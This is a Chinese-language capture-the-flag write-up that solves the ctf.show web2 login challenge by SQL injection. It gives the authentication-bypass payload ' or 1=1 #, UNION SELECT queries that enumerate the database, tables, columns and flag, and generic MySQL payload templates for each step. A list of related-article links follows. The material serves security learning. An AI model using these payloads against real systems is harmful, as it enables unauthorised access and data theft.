ctf.show web2 最简单的SQL注入

1、一开始的页面

随便输入用户名和密码看它怎么反应
没报错,只是清空了用户名和密码
题目提示是sql注入,那就用burpsuit抓个包,发送到repeater
点击go
既然是登录的页面,那就用万能密码 ’ or 1=1 #,出现欢迎您,ctfshow,说明登录成功,这里得说明一下username=admin’ or 1=1 #password=123这条语句,#号是注释符,所以后面的语句是被注释掉的,所以剩下username=admin’ or 1=1,or是只要满足一个条件就可以,1=1永远是满足的
那现在就判断有多少字段,’ or 1=1 union select 1,2,3 #,出现欢迎你,说明有三个字段
现在要做顺序就是爆库,爆表,爆字段,爆值
爆库
username=admin’ or 1=1 union select 1,database(),3 #$password=123
爆表
username=admin’ or 1=1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=“web2”#&password=123
爆字段
username=admin’ or 1=1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=“flag”#&password=123
爆值
username=admin’ or 1=1 union select 1,flag,3 from flag#&password=123
flag{c4728289-7cd0-43c6-8b2f-f1f4a98a4e97}

这里我总结一下,因为这里的数据库为mysql,爆库、爆表、爆字段、爆值都是那几条语句
爆库:

union select 1,2,3,database(); #   //这里得看有多少字段

爆表:

union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database(); #

爆字段:

union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name="表名"; #

爆值:

union select 1,2,3,字段 from 表名; #

ctf.show web2 最简单的SQL注入相关推荐

  1. 第一次CTF【后台登录、简单的sql注入之、简单的sql注入之2、猫抓老鼠、i春秋 文件上传】

    后台登录 http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php 根据md5($password,true)最后要得到原始二进制字符串,要含有or ,在or ...

  2. 【实验吧】CTF_Web_简单的SQL注入之1

    题目链接:http://ctf5.shiyanbar.com/423/web/ 简单的SQL注入之1,比2,3都简单一些.利用2 的查询语句也可以实现:1'/**/union/**/select/** ...

  3. 简单的SQL注入学习

    引贴: http://blog.163.com/lucia_gagaga/blog/static/26476801920168184648754/ 首先需要编写一个php页面,讲php页面放入/opt ...

  4. 一个简单的SQL注入攻击

    在上一篇博客中:http://blog.csdn.net/suwei19870312/article/details/7579667.讲了Client 端代码和Server端代码的交互. Client ...

  5. 一次简单的SQL注入靶场练习

    一次简单的SQL注入靶场练习 文章目录 一次简单的SQL注入靶场练习 前言 一.靶机下载 二.靶场渗透 1.端口扫描 总结 前言 为了巩固SQL注入以及实战演练的需要,我们来做一次简单的关于SQL注入 ...

  6. 超详细,手把手教你一次简单的SQL注入,不用任何工具,带你走进web安全的大门

    超详细,手把手教你一次简单的SQL注入,不用任何工具,带你走进web安全的大门 靶场网站,网站所有权在二向箔安全学院 知识盒子 简单的SQL注入题目,可以用来入门练习,体验一下实训 老套的题目:提取网 ...

  7. 简单的SQL注入原理

    小白学了一点简单的SQL注入,做了点笔记,感觉挺详细,希望能帮助到学习的伙伴.大佬勿喷,有不足多多的指教. 实验原理 SQL注入攻击是通过将恶意的SQL查询或添加语句插入到应用的输入参数中,再在后台S ...

  8. 简单的SQL注入攻击

    一.寻找目标 如果要对一个网站进行SQL注入攻击,首先就需要找到存在SQL注入漏洞的地方,也就是寻找所谓的注入点.可能的SQL注入点一般存在于登录页面.查找页面或添加页面等用户可以查找或修改数据的地方 ...

  9. sqlmap完成简单的sql注入

    扫描目标站点,是否存在注入 --users获取用户名 --dump --tables探测表和数据库信息 跑出来的字段 admin --dump -T admin -C admin,password暴库 ...

最新文章

  1. 数据库里存json数据
  2. 使用Markdown写数学公式打出百分号%
  3. 3、SpringBoot整合MyBatis注解版及配置文件版
  4. c++远征之多态篇——虚函数及其实现原理
  5. DFB [02] 基础和相关的非常用的几个链接
  6. IEEE754标准浮点格式
  7. WPE 过滤器 滤镜 用法
  8. 更新pip下载jupyter lab
  9. 一天一看————以太网交换机的基本原理与配置!
  10. 安卓神器-kiwi browser
  11. 去掉vue中万恶的eslint
  12. N 个Android 视频教程免费下载
  13. 如何有效提升工作效率?其实就是这四点
  14. ACCESS MDB数据库“对象的必要权限。请让管理员或安装此对象的人为你设置适当的权限”解决办法
  15. 两地三中心是什么意思
  16. 哪些靠谱的方法能在十年内赚 3000 万?
  17. 【C++】构建一个正方形类
  18. linux打开icmp端口,linux – ICMP – 目的地不可达(端口不可达)
  19. 关于控制器及伺服电机的电子齿轮比 的设置
  20. 一个博士应该干什么(转自水木清华)

热门文章

  1. 网站视频直播中p2p流媒体的应用
  2. 信安学习-day15
  3. 字符串转为Date类型
  4. kylin官方给出的优化 以及各个步骤容易出现的问题
  5. 关于西数黑盘那些事 原来这样滴 小伙伴们都惊呆了
  6. 【SW系列】计算机案例之草图文字
  7. 关于svn在eclipse中上传和拉取代码
  8. 为什么喧闹过后,京东还是市值第四的中国互联网公司?
  9. 工具 | 如何对 MySQL 进行 TPC-C 测试?
  10. 与外国教授用email交流